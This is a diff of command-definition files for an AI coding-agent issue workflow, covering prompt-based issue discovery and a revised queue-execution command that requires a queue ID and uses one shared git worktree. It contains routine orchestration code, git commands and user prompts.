||||
const discrepancies = findDiscrepancies(dimensionAFindings, dimensionBFindings, point);
|
||||
|
||||
comparisonResults.push({
|
||||
aspect: point.aspect,
|
||||
dimension_a_count: dimensionAFindings.length,
|
||||
dimension_b_count: dimensionBFindings.length,
|
||||
discrepancies: discrepancies,
|
||||
match_rate: calculateMatchRate(dimensionAFindings, dimensionBFindings)
|
||||
});
|
||||
}
|
||||
|
||||
// Write comparison analysis
|
||||
await writeJson(`${outputDir}/comparison-analysis.json`, {
|
||||
matrix: explorationPlan.comparison_matrix,
|
||||
results: comparisonResults,
|
||||
summary: {
|
||||
total_discrepancies: comparisonResults.reduce((sum, r) => sum + r.discrepancies.length, 0),
|
||||
overall_match_rate: average(comparisonResults.map(r => r.match_rate)),
|
||||
critical_mismatches: comparisonResults.filter(r => r.match_rate < 0.5)
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
// Prioritize all findings
|
||||
const prioritizedFindings = prioritizeFindings(cumulativeFindings, explorationPlan);
|
||||
```
|
||||
|
||||
### Phase 5: Issue Generation & Summary
|
||||
|
||||
```javascript
|
||||
// Convert high-confidence findings to issues
|
||||
const issueWorthy = prioritizedFindings.filter(f =>
|
||||
f.confidence >= 0.7 || f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
|
||||
const issues = issueWorthy.map(finding => ({
|
||||
id: `ISS-${discoveryId}-${finding.id}`,
|
||||
title: finding.title,
|
||||
description: finding.description,
|
||||
source: {
|
||||
discovery_id: discoveryId,
|
||||
finding_id: finding.id,
|
||||
dimension: finding.related_dimension
|
||||
},
|
||||
file: finding.file,
|
||||
line: finding.line,
|
||||
priority: finding.priority,
|
||||
category: finding.category,
|
||||
suggested_fix: finding.suggested_fix,
|
||||
confidence: finding.confidence,
|
||||
status: 'discovered',
|
||||
created_at: new Date().toISOString()
|
||||
}));
|
||||
|
||||
// Write issues
|
||||
await writeJsonl(`${outputDir}/discovery-issues.jsonl`, issues);
|
||||
|
||||
// Update final state (summary embedded in state, no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'complete',
|
||||
updated_at: new Date().toISOString(),
|
||||
results: {
|
||||
total_iterations: iteration,
|
||||
total_findings: cumulativeFindings.length,
|
||||
issues_generated: issues.length,
|
||||
comparison_match_rate: comparisonResults
|
||||
? average(comparisonResults.map(r => r.match_rate))
|
||||
: null
|
||||
}
|
||||
});
|
||||
|
||||
// Prompt user for next action
|
||||
await AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Discovery complete: ${issues.length} issues from ${cumulativeFindings.length} findings across ${iteration} iterations. What next?`,
|
||||
header: "Next Step",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Export to Issues (Recommended)", description: `Export ${issues.length} issues for planning` },
|
||||
{ label: "Review Details", description: "View comparison analysis and iteration details" },
|
||||
{ label: "Run Deeper", description: "Continue with more iterations" },
|
||||
{ label: "Skip", description: "Complete without exporting" }
|
||||
]
|
||||
}]
|
||||
});
|
||||
```
|
||||
|
||||
## Output File Structure
|
||||
|
||||
```
|
||||
.workflow/issues/discoveries/
|
||||
└── {DBP-YYYYMMDD-HHmmss}/
|
||||
├── discovery-state.json # Session state with iteration tracking
|
||||
├── iterations/
|
||||
│ ├── 1/
|
||||
│ │ └── {dimension}.json # Dimension findings
|
||||
│ ├── 2/
|
||||
│ │ └── {dimension}.json
|
||||
│ └── ...
|
||||
├── comparison-analysis.json # Cross-dimension comparison (if applicable)
|
||||
└── discovery-issues.jsonl # Generated issue candidates
|
||||
```
|
||||
|
||||
**Simplified Design**:
|
||||
- ACE context and Gemini plan kept in memory, not persisted
|
||||
- Iteration summaries embedded in state
|
||||
- No separate summary.md (state.json contains all needed info)
|
||||
|
||||
## Schema References
|
||||
|
||||
| Schema | Path | Used By |
|
||||
|--------|------|---------|
|
||||
| **Discovery State** | `discovery-state-schema.json` | Orchestrator (state tracking) |
|
||||
| **Discovery Finding** | `discovery-finding-schema.json` | Dimension agents (output) |
|
||||
| **Exploration Plan** | `exploration-plan-schema.json` | Gemini output validation (memory only) |
|
||||
|
||||
## Configuration Options
|
||||
|
||||
| Flag | Default | Description |
|
||||
|------|---------|-------------|
|
||||
| `--scope` | `**/*` | File pattern to explore |
|
||||
| `--depth` | `standard` | `standard` (3 iterations) or `deep` (5+ iterations) |
|
||||
| `--max-iterations` | 5 | Maximum exploration iterations |
|
||||
| `--tool` | `gemini` | Planning tool (gemini/qwen) |
|
||||
| `--plan-only` | `false` | Stop after Phase 2 (Gemini planning), show plan for user review |
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Single Module Deep Dive
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find all potential issues in the auth module" --scope=src/auth/**
|
||||
```
|
||||
|
||||
**Gemini plans** (single dimension):
|
||||
- Dimension: auth-module
|
||||
- Focus: security vulnerabilities, edge cases, error handling, test gaps
|
||||
|
||||
**Iterations**: 2-3 (until no new findings)
|
||||
|
||||
### Example 2: API Contract Comparison
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Check if API calls match implementations" --scope=src/**
|
||||
```
|
||||
|
||||
**Gemini plans** (comparison):
|
||||
- Dimension 1: api-consumers (fetch calls, hooks, services)
|
||||
- Dimension 2: api-providers (handlers, routes, controllers)
|
||||
- Comparison matrix: endpoints, methods, payloads, responses
|
||||
|
||||
### Example 3: Multi-Module Audit
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Audit the payment flow for issues" --scope=src/payment/**
|
||||
```
|
||||
|
||||
**Gemini plans** (multi-dimension):
|
||||
- Dimension 1: payment-logic (calculations, state transitions)
|
||||
- Dimension 2: validation (input checks, business rules)
|
||||
- Dimension 3: error-handling (failure modes, recovery)
|
||||
|
||||
### Example 4: Plan Only Mode
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find inconsistent patterns" --plan-only
|
||||
```
|
||||
|
||||
Stops after Gemini planning, outputs:
|
||||
```
|
||||
Gemini Plan:
|
||||
- Intent: search
|
||||
- Dimensions: 2 (pattern-definitions, pattern-usages)
|
||||
- Estimated iterations: 3
|
||||
|
||||
Continue with exploration? [Y/n]
|
||||
```
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
# After discovery, plan solutions
|
||||
/issue:plan DBP-001-01,DBP-001-02
|
||||
|
||||
# View all discoveries
|
||||
/issue:manage
|
||||
|
||||
# Standard perspective-based discovery
|
||||
/issue:discover src/auth/** --perspectives=security,bug
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Be Specific in Prompts**: More specific prompts lead to better Gemini planning
|
||||
2. **Scope Appropriately**: Narrow scope for focused comparison, wider for audits
|
||||
3. **Review Exploration Plan**: Check `exploration-plan.json` before long explorations
|
||||
4. **Use Standard Depth First**: Start with standard, go deep only if needed
|
||||
5. **Combine with `/issue:discover`**: Use prompt-based for comparisons, perspective-based for audits
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
name: execute
|
||||
description: Execute queue with DAG-based parallel orchestration (one commit per solution)
|
||||
argument-hint: "[--worktree [<existing-path>]] [--queue <queue-id>]"
|
||||
argument-hint: "--queue <queue-id> [--worktree [<existing-path>]]"
|
||||
allowed-tools: TodoWrite(*), Bash(*), Read(*), AskUserQuestion(*)
|
||||
---
|
||||
|
||||
@@ -17,21 +17,64 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
|
||||
- `done <id>` → update solution completion status
|
||||
- No race conditions: status changes only via `done`
|
||||
- **Executor handles all tasks within a solution sequentially**
|
||||
- **Worktree isolation**: Each executor can work in its own git worktree
|
||||
- **Single worktree for entire queue**: One worktree isolates ALL queue execution from main workspace
|
||||
|
||||
## Queue ID Requirement (MANDATORY)
|
||||
|
||||
**Queue ID is REQUIRED.** You MUST specify which queue to execute via `--queue <queue-id>`.
|
||||
|
||||
### If Queue ID Not Provided
|
||||
|
||||
When `--queue` parameter is missing, you MUST:
|
||||
|
||||
1. **List available queues** by running:
|
||||
```javascript
|
||||
const result = Bash('ccw issue queue list --brief --json');
|
||||
const index = JSON.parse(result);
|
||||
```
|
||||
|
||||
2. **Display available queues** to user:
|
||||
```
|
||||
Available Queues:
|
||||
ID Status Progress Issues
|
||||
-----------------------------------------------------------
|
||||
→ QUE-20251215-001 active 3/10 ISS-001, ISS-002
|
||||
QUE-20251210-002 active 0/5 ISS-003
|
||||
QUE-20251205-003 completed 8/8 ISS-004
|
||||
```
|
||||
|
||||
3. **Stop and ask user** to specify which queue to execute:
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which queue would you like to execute?",
|
||||
header: "Queue",
|
||||
multiSelect: false,
|
||||
options: index.queues
|
||||
.filter(q => q.status === 'active')
|
||||
.map(q => ({
|
||||
label: q.id,
|
||||
description: `${q.status}, ${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
|
||||
}))
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
4. **After user selection**, continue execution with the selected queue ID.
|
||||
|
||||
**DO NOT auto-select queues.** Explicit user confirmation is required to prevent accidental execution of wrong queue.
|
||||
|
||||
## Usage
|
||||
|
||||
```bash
|
||||
/issue:execute # Execute active queue(s)
|
||||
/issue:execute --queue QUE-xxx # Execute specific queue
|
||||
/issue:execute --worktree # Use git worktrees for parallel isolation
|
||||
/issue:execute --worktree --queue QUE-xxx
|
||||
/issue:execute --worktree /path/to/existing/worktree # Resume in existing worktree
|
||||
/issue:execute --queue QUE-xxx # Execute specific queue (REQUIRED)
|
||||
/issue:execute --queue QUE-xxx --worktree # Execute in isolated worktree
|
||||
/issue:execute --queue QUE-xxx --worktree /path/to/existing/worktree # Resume
|
||||
```
|
||||
|
||||
**Parallelism**: Determined automatically by task dependency DAG (no manual control)
|
||||
**Executor & Dry-run**: Selected via interactive prompt (AskUserQuestion)
|
||||
**Worktree**: Creates isolated git worktrees for each parallel executor
|
||||
**Worktree**: Creates ONE worktree for the entire queue execution (not per-solution)
|
||||
|
||||
**⭐ Recommended Executor**: **Codex** - Best for long-running autonomous work (2hr timeout), supports background execution and full write access
|
||||
|
||||
@@ -44,37 +87,101 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
Phase 0 (if --worktree): Setup Worktree Base
|
||||
└─ Ensure .worktrees directory exists
|
||||
Phase 0: Validate Queue ID (REQUIRED)
|
||||
├─ If --queue provided → use specified queue
|
||||
├─ If --queue missing → list queues, prompt user to select
|
||||
└─ Store QUEUE_ID for all subsequent commands
|
||||
|
||||
Phase 0.5 (if --worktree): Setup Queue Worktree
|
||||
├─ Create ONE worktree for entire queue: .ccw/worktrees/queue-<timestamp>
|
||||
├─ All subsequent execution happens in this worktree
|
||||
└─ Main workspace remains clean and untouched
|
||||
|
||||
Phase 1: Get DAG & User Selection
|
||||
├─ ccw issue queue dag [--queue QUE-xxx] → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
|
||||
├─ ccw issue queue dag --queue ${QUEUE_ID} → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
|
||||
└─ AskUserQuestion → executor type (codex|gemini|agent), dry-run mode, worktree mode
|
||||
|
||||
Phase 2: Dispatch Parallel Batch (DAG-driven)
|
||||
├─ Parallelism determined by DAG (no manual limit)
|
||||
├─ All executors work in the SAME worktree (or main if no worktree)
|
||||
├─ For each solution ID in batch (parallel - all at once):
|
||||
│ ├─ (if worktree) Create isolated worktree: git worktree add
|
||||
│ ├─ Executor calls: ccw issue detail <id> (READ-ONLY)
|
||||
│ ├─ Executor gets FULL SOLUTION with all tasks
|
||||
│ ├─ Executor implements all tasks sequentially (T1 → T2 → T3)
|
||||
│ ├─ Executor tests + verifies each task
|
||||
│ ├─ Executor commits ONCE per solution (with formatted summary)
|
||||
│ ├─ Executor calls: ccw issue done <id>
|
||||
│ └─ (if worktree) Cleanup: merge branch, remove worktree
|
||||
│ └─ Executor calls: ccw issue done <id>
|
||||
└─ Wait for batch completion
|
||||
|
||||
Phase 3: Next Batch
|
||||
Phase 3: Next Batch (repeat Phase 2)
|
||||
└─ ccw issue queue dag → check for newly-ready solutions
|
||||
|
||||
Phase 4 (if --worktree): Worktree Completion
|
||||
├─ All batches complete → prompt for merge strategy
|
||||
└─ Options: Create PR / Merge to main / Keep branch
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### Phase 0: Validate Queue ID
|
||||
|
||||
```javascript
|
||||
// Check if --queue was provided
|
||||
let QUEUE_ID = args.queue;
|
||||
|
||||
if (!QUEUE_ID) {
|
||||
// List available queues
|
||||
const listResult = Bash('ccw issue queue list --brief --json').trim();
|
||||
const index = JSON.parse(listResult);
|
||||
|
||||
if (index.queues.length === 0) {
|
||||
console.log('No queues found. Use /issue:queue to create one first.');
|
||||
return;
|
||||
}
|
||||
|
||||
// Filter active queues only
|
||||
const activeQueues = index.queues.filter(q => q.status === 'active');
|
||||
|
||||
if (activeQueues.length === 0) {
|
||||
console.log('No active queues found.');
|
||||
console.log('Available queues:', index.queues.map(q => `${q.id} (${q.status})`).join(', '));
|
||||
return;
|
||||
}
|
||||
|
||||
// Display and prompt user
|
||||
console.log('\nAvailable Queues:');
|
||||
console.log('ID'.padEnd(22) + 'Status'.padEnd(12) + 'Progress'.padEnd(12) + 'Issues');
|
||||
console.log('-'.repeat(70));
|
||||
for (const q of index.queues) {
|
||||
const marker = q.id === index.active_queue_id ? '→ ' : ' ';
|
||||
console.log(marker + q.id.padEnd(20) + q.status.padEnd(12) +
|
||||
`${q.completed_solutions || 0}/${q.total_solutions || 0}`.padEnd(12) +
|
||||
q.issue_ids.join(', '));
|
||||
}
|
||||
|
||||
const answer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which queue would you like to execute?",
|
||||
header: "Queue",
|
||||
multiSelect: false,
|
||||
options: activeQueues.map(q => ({
|
||||
label: q.id,
|
||||
description: `${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
|
||||
}))
|
||||
}]
|
||||
});
|
||||
|
||||
QUEUE_ID = answer['Queue'];
|
||||
}
|
||||
|
||||
console.log(`\n## Executing Queue: ${QUEUE_ID}\n`);
|
||||
```
|
||||
|
||||
### Phase 1: Get DAG & User Selection
|
||||
|
||||
```javascript
|
||||
// Get dependency graph and parallel batches
|
||||
const dagJson = Bash(`ccw issue queue dag`).trim();
|
||||
// Get dependency graph and parallel batches (QUEUE_ID required)
|
||||
const dagJson = Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim();
|
||||
const dag = JSON.parse(dagJson);
|
||||
|
||||
if (dag.error || dag.ready_count === 0) {
|
||||
@@ -115,12 +222,12 @@ const answer = AskUserQuestion({
|
||||
]
|
||||
},
|
||||
{
|
||||
question: 'Use git worktrees for parallel isolation?',
|
||||
question: 'Use git worktree for queue isolation?',
|
||||
header: 'Worktree',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Yes (Recommended for parallel)', description: 'Each executor works in isolated worktree branch' },
|
||||
{ label: 'No', description: 'Work directly in current directory (serial only)' }
|
||||
{ label: 'Yes (Recommended)', description: 'Create ONE worktree for entire queue - main stays clean' },
|
||||
{ label: 'No', description: 'Work directly in current directory' }
|
||||
]
|
||||
}
|
||||
]
|
||||
@@ -140,7 +247,7 @@ if (isDryRun) {
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 2: Dispatch Parallel Batch (DAG-driven)
|
||||
### Phase 0 & 2: Setup Queue Worktree & Dispatch
|
||||
|
||||
```javascript
|
||||
// Parallelism determined by DAG - no manual limit
|
||||
@@ -158,24 +265,40 @@ TodoWrite({
|
||||
|
||||
console.log(`\n### Executing Solutions (DAG batch 1): ${batch.join(', ')}`);
|
||||
|
||||
// Setup worktree base directory if needed (using absolute paths)
|
||||
if (useWorktree) {
|
||||
// Use absolute paths to avoid issues when running from subdirectories
|
||||
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
|
||||
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
|
||||
Bash(`mkdir -p "${worktreeBase}"`);
|
||||
// Prune stale worktrees from previous interrupted executions
|
||||
Bash('git worktree prune');
|
||||
}
|
||||
|
||||
// Parse existing worktree path from args if provided
|
||||
// Example: --worktree /path/to/existing/worktree
|
||||
const existingWorktree = args.worktree && typeof args.worktree === 'string' ? args.worktree : null;
|
||||
|
||||
// Setup ONE worktree for entire queue (not per-solution)
|
||||
let worktreePath = null;
|
||||
let worktreeBranch = null;
|
||||
|
||||
if (useWorktree) {
|
||||
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
|
||||
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
|
||||
Bash(`mkdir -p "${worktreeBase}"`);
|
||||
Bash('git worktree prune'); // Cleanup stale worktrees
|
||||
|
||||
if (existingWorktree) {
|
||||
// Resume mode: Use existing worktree
|
||||
worktreePath = existingWorktree;
|
||||
worktreeBranch = Bash(`git -C "${worktreePath}" branch --show-current`).trim();
|
||||
console.log(`Resuming in existing worktree: ${worktreePath} (branch: ${worktreeBranch})`);
|
||||
} else {
|
||||
// Create mode: ONE worktree for the entire queue
|
||||
const timestamp = new Date().toISOString().replace(/[-:T]/g, '').slice(0, 14);
|
||||
worktreeBranch = `queue-exec-${dag.queue_id || timestamp}`;
|
||||
worktreePath = `${worktreeBase}/${worktreeBranch}`;
|
||||
Bash(`git worktree add "${worktreePath}" -b "${worktreeBranch}"`);
|
||||
console.log(`Created queue worktree: ${worktreePath}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Launch ALL solutions in batch in parallel (DAG guarantees no conflicts)
|
||||
// All executors work in the SAME worktree (or main if no worktree)
|
||||
const executions = batch.map(solutionId => {
|
||||
updateTodo(solutionId, 'in_progress');
|
||||
return dispatchExecutor(solutionId, executor, useWorktree, existingWorktree);
|
||||
return dispatchExecutor(solutionId, executor, worktreePath);
|
||||
});
|
||||
|
||||
await Promise.all(executions);
|
||||
@@ -185,126 +308,20 @@ batch.forEach(id => updateTodo(id, 'completed'));
|
||||
### Executor Dispatch
|
||||
|
||||
```javascript
|
||||
function dispatchExecutor(solutionId, executorType, useWorktree = false, existingWorktree = null) {
|
||||
// Worktree setup commands (if enabled) - using absolute paths
|
||||
// Supports both creating new worktrees and resuming in existing ones
|
||||
const worktreeSetup = useWorktree ? `
|
||||
### Step 0: Setup Isolated Worktree
|
||||
\`\`\`bash
|
||||
# Use absolute paths to avoid issues when running from subdirectories
|
||||
REPO_ROOT=$(git rev-parse --show-toplevel)
|
||||
WORKTREE_BASE="\${REPO_ROOT}/.ccw/worktrees"
|
||||
|
||||
# Check if existing worktree path was provided
|
||||
EXISTING_WORKTREE="${existingWorktree || ''}"
|
||||
|
||||
if [[ -n "\${EXISTING_WORKTREE}" && -d "\${EXISTING_WORKTREE}" ]]; then
|
||||
# Resume mode: Use existing worktree
|
||||
WORKTREE_PATH="\${EXISTING_WORKTREE}"
|
||||
WORKTREE_NAME=$(basename "\${WORKTREE_PATH}")
|
||||
|
||||
# Verify it's a valid git worktree
|
||||
if ! git -C "\${WORKTREE_PATH}" rev-parse --is-inside-work-tree &>/dev/null; then
|
||||
echo "Error: \${EXISTING_WORKTREE} is not a valid git worktree"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "Resuming in existing worktree: \${WORKTREE_PATH}"
|
||||
else
|
||||
# Create mode: New worktree with timestamp
|
||||
WORKTREE_NAME="exec-${solutionId}-$(date +%H%M%S)"
|
||||
WORKTREE_PATH="\${WORKTREE_BASE}/\${WORKTREE_NAME}"
|
||||
|
||||
# Ensure worktree base exists
|
||||
mkdir -p "\${WORKTREE_BASE}"
|
||||
|
||||
# Prune stale worktrees
|
||||
git worktree prune
|
||||
|
||||
# Create worktree
|
||||
git worktree add "\${WORKTREE_PATH}" -b "\${WORKTREE_NAME}"
|
||||
|
||||
echo "Created new worktree: \${WORKTREE_PATH}"
|
||||
fi
|
||||
|
||||
# Setup cleanup trap for graceful failure handling
|
||||
cleanup_worktree() {
|
||||
echo "Cleaning up worktree due to interruption..."
|
||||
cd "\${REPO_ROOT}" 2>/dev/null || true
|
||||
git worktree remove "\${WORKTREE_PATH}" --force 2>/dev/null || true
|
||||
echo "Worktree removed. Branch '\${WORKTREE_NAME}' kept for inspection."
|
||||
}
|
||||
trap cleanup_worktree EXIT INT TERM
|
||||
|
||||
cd "\${WORKTREE_PATH}"
|
||||
\`\`\`
|
||||
` : '';
|
||||
|
||||
const worktreeCleanup = useWorktree ? `
|
||||
### Step 5: Worktree Completion (User Choice)
|
||||
|
||||
After all tasks complete, prompt for merge strategy:
|
||||
|
||||
\`\`\`javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Solution ${solutionId} completed. What to do with worktree branch?",
|
||||
header: "Merge",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Create PR (Recommended)", description: "Push branch and create pull request - safest for parallel execution" },
|
||||
{ label: "Merge to main", description: "Merge branch and cleanup worktree (requires clean main)" },
|
||||
{ label: "Keep branch", description: "Cleanup worktree, keep branch for manual handling" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
\`\`\`
|
||||
|
||||
**Based on selection:**
|
||||
\`\`\`bash
|
||||
# Disable cleanup trap before intentional cleanup
|
||||
trap - EXIT INT TERM
|
||||
|
||||
# Return to repo root (use REPO_ROOT from setup)
|
||||
cd "\${REPO_ROOT}"
|
||||
|
||||
# Validate main repo state before merge
|
||||
validate_main_clean() {
|
||||
if [[ -n \$(git status --porcelain) ]]; then
|
||||
echo "⚠️ Warning: Main repo has uncommitted changes."
|
||||
echo "Cannot auto-merge. Falling back to 'Create PR' option."
|
||||
return 1
|
||||
fi
|
||||
return 0
|
||||
}
|
||||
|
||||
# Create PR (Recommended for parallel execution):
|
||||
git push -u origin "\${WORKTREE_NAME}"
|
||||
gh pr create --title "Solution ${solutionId}" --body "Issue queue execution"
|
||||
git worktree remove "\${WORKTREE_PATH}"
|
||||
|
||||
# Merge to main (only if main is clean):
|
||||
if validate_main_clean; then
|
||||
git merge --no-ff "\${WORKTREE_NAME}" -m "Merge solution ${solutionId}"
|
||||
git worktree remove "\${WORKTREE_PATH}" && git branch -d "\${WORKTREE_NAME}"
|
||||
else
|
||||
# Fallback to PR if main is dirty
|
||||
git push -u origin "\${WORKTREE_NAME}"
|
||||
gh pr create --title "Solution ${solutionId}" --body "Issue queue execution (main had uncommitted changes)"
|
||||
git worktree remove "\${WORKTREE_PATH}"
|
||||
fi
|
||||
|
||||
# Keep branch:
|
||||
git worktree remove "\${WORKTREE_PATH}"
|
||||
echo "Branch \${WORKTREE_NAME} kept for manual handling"
|
||||
\`\`\`
|
||||
|
||||
**Parallel Execution Safety**: "Create PR" is the default and safest option for parallel executors, avoiding merge race conditions.
|
||||
` : '';
|
||||
// worktreePath: path to shared worktree (null if not using worktree)
|
||||
function dispatchExecutor(solutionId, executorType, worktreePath = null) {
|
||||
// If worktree is provided, executor works in that directory
|
||||
// No per-solution worktree creation - ONE worktree for entire queue
|
||||
const cdCommand = worktreePath ? `cd "${worktreePath}"` : '';
|
||||
|
||||
const prompt = `
|
||||
## Execute Solution ${solutionId}
|
||||
${worktreeSetup}
|
||||
${worktreePath ? `
|
||||
### Step 0: Enter Queue Worktree
|
||||
\`\`\`bash
|
||||
cd "${worktreePath}"
|
||||
\`\`\`
|
||||
` : ''}
|
||||
### Step 1: Get Solution (read-only)
|
||||
\`\`\`bash
|
||||
ccw issue detail ${solutionId}
|
||||
@@ -352,16 +369,21 @@ If any task failed:
|
||||
\`\`\`bash
|
||||
ccw issue done ${solutionId} --fail --reason '{"task_id": "TX", "error_type": "test_failure", "message": "..."}'
|
||||
\`\`\`
|
||||
${worktreeCleanup}`;
|
||||
|
||||
**Note**: Do NOT cleanup worktree after this solution. Worktree is shared by all solutions in the queue.
|
||||
`;
|
||||
|
||||
// For CLI tools, pass --cd to set working directory
|
||||
const cdOption = worktreePath ? ` --cd "${worktreePath}"` : '';
|
||||
|
||||
if (executorType === 'codex') {
|
||||
return Bash(
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}`,
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}${cdOption}`,
|
||||
{ timeout: 7200000, run_in_background: true } // 2hr for full solution
|
||||
);
|
||||
} else if (executorType === 'gemini') {
|
||||
return Bash(
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}`,
|
||||
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}${cdOption}`,
|
||||
{ timeout: 3600000, run_in_background: true }
|
||||
);
|
||||
} else {
|
||||
@@ -369,7 +391,7 @@ ${worktreeCleanup}`;
|
||||
subagent_type: 'code-developer',
|
||||
run_in_background: false,
|
||||
description: `Execute solution ${solutionId}`,
|
||||
prompt: prompt
|
||||
prompt: worktreePath ? `Working directory: ${worktreePath}\n\n${prompt}` : prompt
|
||||
});
|
||||
}
|
||||
}
|
||||
@@ -378,8 +400,8 @@ ${worktreeCleanup}`;
|
||||
### Phase 3: Check Next Batch
|
||||
|
||||
```javascript
|
||||
// Refresh DAG after batch completes
|
||||
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag`).trim());
|
||||
// Refresh DAG after batch completes (use same QUEUE_ID)
|
||||
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim());
|
||||
|
||||
console.log(`
|
||||
## Batch Complete
|
||||
@@ -389,46 +411,117 @@ console.log(`
|
||||
`);
|
||||
|
||||
if (refreshedDag.ready_count > 0) {
|
||||
console.log('Run `/issue:execute` again for next batch.');
|
||||
console.log(`Run \`/issue:execute --queue ${QUEUE_ID}\` again for next batch.`);
|
||||
// Note: If resuming, pass existing worktree path:
|
||||
// /issue:execute --queue ${QUEUE_ID} --worktree <worktreePath>
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: Worktree Completion (after ALL batches)
|
||||
|
||||
```javascript
|
||||
// Only run when ALL solutions completed AND using worktree
|
||||
if (useWorktree && refreshedDag.ready_count === 0 && refreshedDag.completed_count === refreshedDag.total) {
|
||||
console.log('\n## All Solutions Completed - Worktree Cleanup');
|
||||
|
||||
const answer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Queue complete. What to do with worktree branch "${worktreeBranch}"?`,
|
||||
header: 'Merge',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Create PR (Recommended)', description: 'Push branch and create pull request' },
|
||||
{ label: 'Merge to main', description: 'Merge all commits and cleanup worktree' },
|
||||
{ label: 'Keep branch', description: 'Cleanup worktree, keep branch for manual handling' }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
|
||||
|
||||
if (answer['Merge'].includes('Create PR')) {
|
||||
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
|
||||
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution - all solutions completed" --head "${worktreeBranch}"`);
|
||||
Bash(`git worktree remove "${worktreePath}"`);
|
||||
console.log(`PR created for branch: ${worktreeBranch}`);
|
||||
} else if (answer['Merge'].includes('Merge to main')) {
|
||||
// Check main is clean
|
||||
const mainDirty = Bash('git status --porcelain').trim();
|
||||
if (mainDirty) {
|
||||
console.log('Warning: Main has uncommitted changes. Falling back to PR.');
|
||||
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
|
||||
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution (main had uncommitted changes)" --head "${worktreeBranch}"`);
|
||||
} else {
|
||||
Bash(`git merge --no-ff "${worktreeBranch}" -m "Merge queue ${dag.queue_id}"`);
|
||||
Bash(`git branch -d "${worktreeBranch}"`);
|
||||
}
|
||||
Bash(`git worktree remove "${worktreePath}"`);
|
||||
} else {
|
||||
Bash(`git worktree remove "${worktreePath}"`);
|
||||
console.log(`Branch ${worktreeBranch} kept for manual handling`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Parallel Execution Model
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator │
|
||||
├─────────────────────────────────────────────────────────────┤
|
||||
│ 1. ccw issue queue dag │
|
||||
│ → { parallel_batches: [["S-1","S-2"], ["S-3"]] } │
|
||||
│ │
|
||||
│ 2. Dispatch batch 1 (parallel): │
|
||||
│ ┌──────────────────────┐ ┌──────────────────────┐ │
|
||||
│ │ Executor 1 │ │ Executor 2 │ │
|
||||
│ │ detail S-1 │ │ detail S-2 │ │
|
||||
│ │ → gets full solution │ │ → gets full solution │ │
|
||||
│ │ [T1→T2→T3 sequential]│ │ [T1→T2 sequential] │ │
|
||||
│ │ commit (1x solution) │ │ commit (1x solution) │ │
|
||||
│ │ done S-1 │ │ done S-2 │ │
|
||||
│ └──────────────────────┘ └──────────────────────┘ │
|
||||
│ │
|
||||
│ 3. ccw issue queue dag (refresh) │
|
||||
│ → S-3 now ready (S-1 completed, file conflict resolved) │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ 0. Validate QUEUE_ID (required, or prompt user to select) │
|
||||
│ │
|
||||
│ 0.5 (if --worktree) Create ONE worktree for entire queue │
|
||||
│ → .ccw/worktrees/queue-exec-<queue-id> │
|
||||
│ │
|
||||
│ 1. ccw issue queue dag --queue ${QUEUE_ID} │
|
||||
